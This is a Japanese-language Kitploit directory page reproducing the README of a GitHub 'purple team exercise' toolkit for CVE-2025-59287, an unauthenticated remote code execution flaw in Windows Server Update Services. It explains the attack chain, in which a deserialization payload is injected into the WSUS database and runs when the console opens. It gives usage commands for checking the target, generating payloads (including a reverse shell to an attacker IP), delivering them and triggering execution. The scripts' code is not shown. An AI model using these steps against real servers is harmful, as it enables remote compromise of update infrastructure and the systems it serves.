Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-59287-Exercise-Use — 紫チーム演習スクリプト。WSUSデータベースへの悪意あるデシリアライズペイロード注入によるWSUSにおける認証不要のRCE(CVE-2025-59287)を実証します。 | Kitploit
ツール/GitHubGitHub/swoon69/cve-2025-59287-exercise-use
脆弱性分析エクスプロイトペネトレーションテスト学習と教育レッドチーミングペイロード開発ラボと実践
GitHubswoon69/cve-2025-59287-exercise-use

CVE-2025-59287-Exercise-Use

紫チーム演習スクリプト。WSUSデータベースへの悪意あるデシリアライズペイロード注入によるWSUSにおける認証不要のRCE(CVE-2025-59287)を実証します。

リポジトリを見る
26ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-59287 — WSUS 認証なし RCE

CVE-2025-59287(Windows Server Update Services (WSUS) の認証なしリモートコード実行脆弱性)のためのパープルチーム演習スクリプトです。

許可された用途のみ。 自分が所有する、または明示的な書面によるテスト許可を得たシステムに対して、管理された演習環境でのみ使用してください。

動作原理

この脆弱性は、匿名でアクセス可能な WSUS SOAP エンドポイントを悪用し、悪意のあるデシリアライゼーションペイロードを WSUS データベースに注入します。ペイロードは、WSUS 管理コンソールが開かれたとき、または同期がトリガーされたときに実行されます。

  1. WSUS 認証サービスは、匿名クライアントに対して有効なトークンを発行します
  2. トークンは、クライアント Web サービスを介してレポートセッションクッキーと交換されます
  3. 悪意のあるシリアライズオブジェクトが、レポートサービスを介して WSUS データベースに注入されます
  4. ペイロードは、WSUS コンソールがロードされたとき、または同期イベントが発生したときに実行されます

必要条件

  • PowerShell 5.1 以降を搭載した Windows 攻撃ボックス
  • ポート 8530 での WSUS へのネットワークアクセス
  • ysoserial\Release\ フォルダに配置された ysoserial.net (セットアップ参照)

リポジトリ構成

root@kitploit:~
wsus-cve-2025-59287/
├── 1-check.ps1       # Verify target is vulnerable
├── 2-generate.ps1    # Generate serialized payload blob
├── 3-deliver.ps1     # Deliver payload to WSUS server
├── 4-verify.ps1      # Verify execution and clean up
├── ysoserial/        # Place ysoserial.net release here (not committed)
│   └── Release/
│       └── ysoserial.exe
└── README.md

セットアップ

リポジトリをクローンまたはダウンロードします。パスが ysoserial\Release\ysoserial.exe と一致するように ysoserial.net を追加します。

ysoserial.net を以下からダウンロードしてください: https://github.com/pwntester/ysoserial.net/releases/tag/v1.36 デフォルトで Windows Defender がトリガーされます

使用方法

すべてのスクリプトはリポジトリルートから実行してください。

1 — チェック

root@kitploit:~
.\1-check.ps1 -TargetURL "http://<wsus-ip>:8530"

2 — 生成

ファイルドロップ(リスナー不要、最初に推奨):

root@kitploit:~
.\2-generate.ps1 -Mode filedrop

リバースシェル:

root@kitploit:~
.\2-generate.ps1 -Mode shell -LHost <attacker-ip> -LPort 4444

3 — 配信

root@kitploit:~
.\3-deliver.ps1 -TargetURL "http://<wsus-ip>:8530"

4 — トリガー

WSUS サーバー上で、[スタート] > [Windows Server Update Services] から管理コンソールを開くか、PowerShell 経由で同期をトリガーします:

root@kitploit:~
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()

5 — 確認とクリーンアップ

実行の確認:

root@kitploit:~
.\4-verify.ps1

すべてのアーティファクトの確認とクリーンアップ:

root@kitploit:~
.\4-verify.ps1 -Cleanup

攻撃ボックスから管理共有経由:

root@kitploit:~
.\4-verify.ps1 -WsusIP <wsus-ip> -Cleanup

クリーンアップ後、WSUS コンソールの [Computers] から演習用コンピュータを削除してください。

検出の機会

参考文献

  • CVE-2025-59287 — オリジナル調査:hawktrace.com\
  • ysoserial
  • NIST
  • .NET Exploit/Blob gen
  • tecxx
  • mrk336
ツールをダウンロード